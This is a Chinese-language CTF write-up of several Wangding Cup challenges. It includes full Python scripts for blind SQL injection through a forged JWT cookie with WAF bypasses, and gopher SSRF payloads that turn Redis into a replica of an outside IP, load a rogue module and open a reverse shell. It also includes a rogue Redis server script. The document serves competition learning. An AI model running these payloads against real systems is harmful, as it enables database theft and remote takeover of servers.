當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
網鼎杯【玄武組】CTF部分題
0x01 簽到題
查看JS,在JS中找到p14.php,直接copy下來console執行,輸入戰隊的token就可以了
例如:
http://xxxxx.cloudgame1.ichunqiu.com/css/game_manager.js
得到關鍵的 POST 發包方式
0x02 Web(JS_ON)
順手輸入一個 admin admin,看到下面的信息
啊... ... 一登陸就進去了,而且還給了Key ,有點迷,跑去登錄框的頁面試了試注入... ...,然後你會收到如下截圖:
哈哈,做個題,還被罵... ...太難了,出題人素質有待加強呀。最後.... ....,key很明顯是 JSON Web Token(JWT) 的key,然後猜會不會是JWT僞造?發現是存在在Cooke 處的token 的user 存在注入,剛開始一直在繞waf,很傻逼,空格和select 都被過濾了,空格(/**/)繞過後,select 一直沒繞過(很尷尬),最後是通過se<>lect 繞過了過濾
最開始一直用DNSlog 來注入,然後發現無法帶出數據... ... ,諮詢了一下朋友,他們說如果你要用DNSLog 的話,就要用Windows 的DNSLog,要不然你帶不出來數據,可能是它這個容器有點問題.. ...(咋也不知道,咋也不敢問),隨後放棄DNSLog 盲注,使用盲猜來注入,此時就要寫腳本了,腳本是同事寫的(我就開始划水了):
#coding:utf-8
import jwt
import base64
import requests
public = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
flag = ""
xx = "{}-0123456789abcdefghijklmnopqrstuvwxyz"
#xx = "{}-0123456789abcdefgl"
#print xx
for i in range(1,43):
for d in xx:
payload = "admin'/**/and mid(concat(load_file('/flag')),"+str(i)+",1)='"+str(d)+"' and ''='"
payload = payload.replace(" ", "/**/") payload=payload.replace("select", "sel<>ect")
a = jwt.encode({"user": payload,"news": ""}, key=public, algorithm='HS256')
token = {"Cookie":"token="+a}
#print payload
#print token
url = "http://xxxx.clou dgame2.ichunqiu.com/index.php"
re = requests.get(url,headers=token)
#print re.text
if "Message" not in re.text:
flag=flag+str(d)
print flag
continue
print flag
運行結果:
網上其它師傅公佈的代碼:
https://mp.weixin.qq.com/s/Kr2AlygNpeM7UYiLPINcrA
# coding=utf-8
import jwt
import requests
import re
requests.packages.urllib3.disable_warnings()
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://84f801d8da46417d9747f9bb2f8187b963c126676ca644fd.cloudgame1.ichunqiu.com/index.php"
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])
# if info:
# print(info)
# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"
def half_interval():
result = ""
for i in range(1,45):
min = 32
max = 127
while abs(max-min) > 1:
mid = (min + max)//2
payload = payloadTmpl.format(i,mid)
jwttoken = {
"user": payload,
"news": "success"
}
payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
cookies = dict(token=str(payload))
res = requests.get(url,cookies=cookies,proxies=proxies)
if re.findall("success", res.text) != []:
min = mid
else:
max = mid
result += chr(max)
print(result)
if __name__ == "__main__":
half_interval()
# payload = payloadTmpl.format(1,32)
# jwttoken = {
# "user": payload,
# "news": "success"
# }
# print(jwttoken)
# payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
# cookies = dict(token=str(payload))
# res = requests.get(url,cookies=cookies,proxies=proxies)
# res.encoding='utf-8'
# print(res.text)
運行結果:
0x03 ssrfme
這題思路跑偏了,到了最後一步getshell 一直弄不進去,事後才知道是主從複製的解法,還是太菜了,唉... ...
看看其它師傅們的思路吧
獲取到hint的源碼,提示ssrf 打 redis,直接寫contrab在save的時候提示沒權限,寫shell不知道路徑
一直主從複製也沒成功
很坑,沒權限
後來檢查一下發現目錄不對,轉移到有權限的/tmp 下面
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit然後,重複主從的步驟,在自己的VPS上起好了 rogue 服務器
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252039.107.68.253%252060001%250d%250aquit服務器監聽
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.rev%252039.107.68.253%252060003%250d%250aquitrogue.py
import socket import time CRLF="\r\n" payload=open("exp.so","rb").read() exp_filename="exp.so" def redis_format(arr): global CRLF global payload redis_arr=arr.split(" ") cmd="" cmd+="*"+str(len(redis_arr)) for x in redis_arr: cmd+=CRLF+"$"+str(len(x))+CRLF+x cmd+=CRLF return cmd def redis_connect(rhost,rport): sock=socket.socket() sock.connect((rhost,rport)) return sock def send(sock,cmd): sock.send(redis_format(cmd)) print(sock.recv(1024).decode("utf-8")) def interact_shell(sock): flag=True try: while flag: shell=raw_input("\033[1;32;40m[*]\033[0m ") shell=shell.replace(" ","${IFS}") if shell=="exit" or shell=="quit": flag=False else: send(sock,"system.exec {}".format(shell)) except KeyboardInterrupt: return def RogueServer(lport): global CRLF global payload flag=True result="" sock=socket.socket() sock.bind(("0.0.0.0",lport)) sock.listen(10) clientSock, address = sock.accept() while flag: data = clientSock.recv(1024) if "PING" in data: result="+PONG"+CRLF clientSock.send(result) flag=True elif "REPLCONF" in data: result="+OK"+CRLF clientSock.send(result) flag=True elif "PSYNC" in data or "SYNC" in data: result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF result += "$" + str(len(payload)) + CRLF result = result.encode() result += payload result += CRLF clientSock.send(result) flag=False if __name__=="__main__": lhost="xxx.xxx.xxx.xxx" lport=60001運行結果:
臺下言說小夥伴比賽結束後分享的解題WP
Redis Pass 後使用腳本的RCE:https://github.com/xmsec/redis-ssrf
0x04 Java 反編譯
這題... ...慘不忍睹,小夥伴沒注意看,把獲得的Key 給弄錯了... ...所以一直解密獲取Flag 失敗,尷尬。
解法:
主程序邏輯並不複雜,正常的輸入,以及將輸入進行計算後比對
先對用戶輸入進行 AES 加密 ,Key 爲 aes_check_key!@#,然後進行兩次異或,最後 base64 編碼
與 VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3進行比較
所以 crack 過程也很簡單,逆回來就得到輸入,但是中間卡在密鑰並不是直接給的密鑰,還對密鑰裏 'e' 和 'o'進行了替換,最終密鑰爲 aos_chock_koy!@#,逆回去得到flag
0x05 勒索病毒分析
剛開始以爲是要對文件進行解密才能拿到Flag,後來發現不對勁,然後自己打開的事件文件文本用win10 打不開,說文本太大了,最後放到win7 下面去打開事件查看器,直接定位被加密文件最後修改的日期,然後往前看,最後定位到此處
得到 ip 時間 登錄用戶信息
192.200.200.40
2020-4-15_20:01:59
admin
雖然我們生活在陰溝裏,但依然有人仰望星空!